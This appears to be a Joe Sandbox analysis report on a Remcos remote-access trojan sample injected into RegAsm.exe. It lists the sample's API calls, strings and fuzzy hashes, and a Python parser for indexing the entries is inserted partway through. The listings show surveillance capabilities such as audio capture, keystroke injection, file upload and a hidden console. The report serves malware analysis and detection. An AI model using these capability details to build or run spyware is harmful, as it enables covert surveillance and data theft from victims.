• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID: t'`/
• API String ID: 1324828854-2084328917
• Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
• Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
• Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
• Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
• Sleep.KERNEL32(00000064), ref: 0041755C
• DeleteFileW.KERNEL32(00000000), ref: 00417590
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• API String ID: 1462127192-2001430897
• Opcode ID: b827631b01624cec3b1a05f5300d16c98e5fb05e7b31027332e097454240baf4
• Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
• Opcode Fuzzy Hash: b827631b01624cec3b1a05f5300d16c98e5fb05e7b31027332e097454240baf4
• Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
APIs
• GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
• GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
• API String ID: 2050909247-4242073005
• Opcode ID: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
• Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
• Opcode Fuzzy Hash: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
• Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
APIs
• _strftime.LIBCMT ref: 00401D50
  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
• API String ID: 3809562944-243156785
• Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
• Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
• Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
• Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
• int.LIBCPMT ref: 00410EBC
  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
• std::_Facet_Register.LIBCPMT ref: 00410EFC
• std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
• __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
• __Init_thread_footer.LIBCMT ref: 00410F64
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
• String ID: ,kG$0kG
• API String ID: 3815856325-2015055088
• Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
• Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
• Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
• Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
• waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
• waveInStart.WINMM ref: 00401CFE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: dMG$|MG$PG
• API String ID: 1356121797-532278878
• Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
• Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
• Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
• Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                                                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                                                                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                                                                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                                                                                  • GetMessageA.USER32 ref: 0041D591
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                  • String ID: Remcos
                                                                                                                                                                                                  • API String ID: 1970332568-165870891
                                                                                                                                                                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                                                                  • String ID: a/p$am/pm$h{D$t'`/
                                                                                                                                                                                                  • API String ID: 2936374016-2929343098
                                                                                                                                                                                                  • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                                                                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: tcp$udp
                                                                                                                                                                                                  • API String ID: 0-3725065008
                                                                                                                                                                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444E87
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444E9E
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444EBD
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444ED8
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444EEF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                  • String ID: KED$t'`/
                                                                                                                                                                                                  • API String ID: 3033488037-4184823727
                                                                                                                                                                                                  • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                                                                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                                  • String ID: PkG$XMG$NG$NG
                                                                                                                                                                                                  • API String ID: 1649129571-3151166067
                                                                                                                                                                                                  • Opcode ID: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                                                                                                                                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
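The per-function entries above (an API call list with "Part of subcall function" sub-entries, then the Similarity fields: API ID, String ID, API String ID and the opcode/instruction fuzzy hashes) are easier to triage and to compare across samples as structured records. The parser below is an added example written for this page; it is not Joe Sandbox code or any part of the report tooling. Its sample input is abridged from the entries on this page (the third entry is deliberately left without an Instruction Fuzzy Hash line, as the report cuts off that way), and the capability tags it assigns (tray icon UI from Shell_NotifyIconA, audio capture from waveIn*, file transfer from CreateFileW + WriteFile + send) are the example's own heuristics, not report fields.

```python
import re
from typing import Dict, List

# Constructed sample input: three entries abridged from the report above. The
# last entry is truncated (no "Instruction Fuzzy Hash" line), as on the page.
SAMPLE = """\
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
  • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
  • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
• lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
• Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
• TranslateMessage.USER32(?), ref: 0041D57A
• DispatchMessageA.USER32(?), ref: 0041D584
• GetMessageA.USER32 ref: 0041D591
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
• Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
APIs
• __Init_thread_footer.LIBCMT ref: 004018BE
• ExitThread.KERNEL32 ref: 004018F6
• waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
Similarity
• API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: PkG$XMG$NG$NG
• Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000), ref: 00407A88
• MoveFileW.KERNEL32 ref: 00407AA5
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
"""

# "Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]*?): ?(?P<val>.*)$")
LINK_RESIDUE = "Download File"  # link text fused to file names by page extraction


def parse_entries(text: str) -> List[Dict]:
    """One record per function. A record closes at its Instruction Fuzzy Hash
    line; a trailing partial record (report cut off) is kept rather than lost."""
    entries, cur = [], {"apis": [], "associated": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"name": m["name"], "module": m["mod"],
                                "args": m["args"].split(",") if m["args"] else [],
                                "ref": m["ref"], "subcall_of": m["sub"]})
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue  # section headers such as "APIs", "Strings", "Similarity"
        key, val = f["key"].lower().replace(" ", "_"), f["val"].strip()
        if val.endswith(LINK_RESIDUE):
            val = val[:-len(LINK_RESIDUE)]
        if key == "associated":
            cur["associated"].append(val)
        else:
            cur[key] = val
        if key == "instruction_fuzzy_hash":
            entries.append(cur)
            cur = {"apis": [], "associated": []}
    if cur["apis"] or cur["associated"] or len(cur) > 2:
        entries.append(cur)
    return entries


# Heuristic capability tags: this example's assumption, not a report field.
CAPABILITY_RULES = {
    "tray_icon_ui": lambda names: "Shell_NotifyIconA" in names,
    "audio_capture": lambda names: any(n.startswith("waveIn") for n in names),
    "file_transfer": lambda names: {"CreateFileW", "WriteFile", "send"} <= names,
}


def tag_capabilities(entry: Dict) -> List[str]:
    names = {a["name"] for a in entry["apis"]}  # direct calls and subcalls alike
    return [tag for tag, rule in CAPABILITY_RULES.items() if rule(names)]


def by_instruction_hash(entries: List[Dict]) -> Dict[str, Dict]:
    """Index complete records by Instruction Fuzzy Hash for cross-sample matching."""
    return {e["instruction_fuzzy_hash"]: e for e in entries if "instruction_fuzzy_hash" in e}


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.get("instruction_fuzzy_hash", "<truncated>")[:16], tag_capabilities(e))
```

The Instruction Fuzzy Hash index is the useful pivot: run the parser over two reports and intersect the two dictionaries' keys to see which functions (tray icon loop, audio capture thread, file transfer) recur between builds, independent of the String IDs, which change with each packed build.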
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000), ref: 00407A88
• MoveFileW.KERNEL32 ref: 00407AA5
• CloseHandle.KERNEL32(00000000), ref: 00407AD0
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
• Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
• Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
• Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
• Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
APIs
• AllocConsole.KERNEL32 ref: 0041CE35
• GetConsoleWindow.KERNEL32 ref: 0041CE3B
• ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Console$Window$AllocOutputShow
• String ID: Remcos v$5.1.2 Pro$CONOUT$
• API String ID: 4067487056-1584637518
• Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
• Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
• Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
• Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
APIs
• SendInput.USER32 ref: 00419A25
• SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
• SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
  • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: InputSend$Virtual
• String ID:
• API String ID: 1167301434-0
• Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
• Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
• Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
• Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID:
• String ID: t'`/
• API String ID: 0-2084328917
• Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
• Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
• Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
• Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
